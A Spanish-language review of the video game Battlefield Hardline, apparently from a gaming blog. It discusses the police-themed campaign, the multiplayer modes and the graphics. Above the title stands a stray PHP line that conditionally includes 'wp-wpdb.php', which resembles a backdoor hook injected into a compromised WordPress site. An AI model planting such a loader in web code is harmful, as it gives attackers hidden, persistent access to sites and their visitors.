if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Battlefield Hardline – La Fortaleza de LeChuck

Análisis Battlefield Hardline

analisis battlefield hardline

Tenemos en nuestras manos un Battlefield diferente, un Battlefield al que los fans de la saga han estado mirando de reojo y con cierto miedo, pues para dar un poco de aire fresco, cambia los soldados de un bando y otro por policías y ladrones, no dejes que ese miedo te atormente, Battlefield Hardline ya está aquí y estamos ante un divertido juego.

Esta vez ha sido Visceral Games y no DICE quien se ha hecho cargo de este nuevo Battlefield, y es que como digo, el motor gráfico puede ser el mismo, puede seguir siendo un FPS, pero tanto en campaña, como en multijugador, se siente un juego realmente distinto. Vamos a ver que es lo que cambia exactamente.

Campaña

En el modo campaña nos encontramos algo bastante original dentro de la saga. Somos un policía nuevo en la ciudad, y tendremos que demostrar que somos válidos para el oficio, así que esta vez no vale disparar a lo loco a todo lo que se menea. Las misiones en este modo campaña hilan una historia algo típica, pero todo es contrarrestado por la jugabilidad. Para comenzar los escenarios son muy distintos a un Battlefield normal, ya que durante nuestras misiones recorreremos las calles de un barrio normal, edificios, etc, que se ven mucho más cercanos y realistas.  En cada uno de los escenarios tendremos cierta libertad, y el juego no nos obligará a desenfundar si la acción no lo requiere, pudiendo detener a los enemigos sorprendiéndolos con un «Están detenidos» enseñando la placa. Con ello nos encontraremos un sistema de disparos algo más realista, en el que con pocos disparos moriremos, así que, como policía deberemos cubrirnos de los enemigos que no nos hacen caso e intentan agredirnos, disparárles, o incluso perseguirles si deciden darse a la fuga.

Battlefield-Hardline

Durante la aventura también tendremos curiosas herramientas (Una especie de arpón que nos sirve para crear tirolinas de la nada o cuerdas para subir a sitios preparados para ello) y cierta libertad dejando atrás más de una y de dos veces los más habituales «pasillos» en este tipo de juegos y en esta saga. Lo mejor sin duda es el tener la opción de detener a casi todos los enemigos en lugar de dispararles sin más, sobre todo porque te permite plantear la partida de las dos formas y disfrutarlas en cada una de ellas. Si escogemos jugar sigilosamente, deberemos evitar la mirada de los enemigos, cual Sam Fisher, y cuando los tengamos de espaldas proceder a detenerlos. Cuanto más te acerques, más posibilidades de que el enemigo decida rendirse. Como véis, original y bastante disfrutable. También, añadir, que encontramos bastantes archivos durante el juego, y no siempre por el camino por el que «se supone debemos ir», así que toca explorar un poquito para sacar el máximo provecho a la campaña, y así de paso subir experiencia en los niveles del juego y conseguir nuevas armas.

Multijugador

El modo multijugador, aunque catalogado por muchos como un simple mod de Battlefield, esconde mucho más trabajo y diversión de lo que uno puede pensar con ver cuatro vídeos en YouTube.

Se divide en varios modos, además de dejar tres clásicos para los fans de la saga. Los otros cinco modos son Atraco, en el que los ladrones deberán robar dos bolsas y huir mientras los policías intentan impedirlo. Puente, donde debemos coger vehículos marcados por el juego y conducirlos el mayor tiempo posible sin que el otro equipo nos mate, ganando el equipo que más tiempo los haya conducido en total. Dinero sangriento, mientras los ladrones intentan robar todo el dinero de un edificio central que pueden y protegerlo llevando el máximo a tu «base», los polícias harán lo mismo, se supone para utilizar de prueba en el caso, y por supuesto, quién lleve más dinero gana. Rescate es el típico modo de rehenes donde los policías deberán intentar liberar al menos a uno de ellos o eliminar a todos los secuestradores.

Battlefield-Hardline-multijugador

Por último tenemos los modos ya conocidos, Conquista pequeña, que se juega en los escenarios más recortados, Conquista grande que utilizan todos los grandes mapas de Battlefield Hardline y TCT: Equipo, el típico modo VS de eliminar al otro equipo con puntuación.

Apartado técnico

Battlefield Hardline utiliza el mismo motor gráfico que Battlefield 4, por lo que veremos un apartado muy parecido, quizás con menos parafernalias y evitando la pirotecnia de la saga principal, pero al fin y al cabo un apartado gráfico sólido y muy digno. En cuanto al sonido sorprende la recreación, como es habitual, de los disparos de cada arma, y cada efecto, esencial para meternos en el dinamismo de la batalla y disfrutar de la mayor inmersión.

Battlefield-Hardline2

Battlefield Hardline es un Battlefield diferente, pero no peor ni mejor que la saga principal. Está claro que ha buscado desmarcarse del «más de lo mismo» y ha logrado buscar un hueco de aire fresco. No se si han hecho bien o mal en llamarse Battlefield, pero lo que está claro es que, si te quitas la venda de los ojos y las manías, vas a pasarlo bomba jugando a Battlefield Hardline. Te puedes hacer con el al mejor precio en OfertasJuegos.com.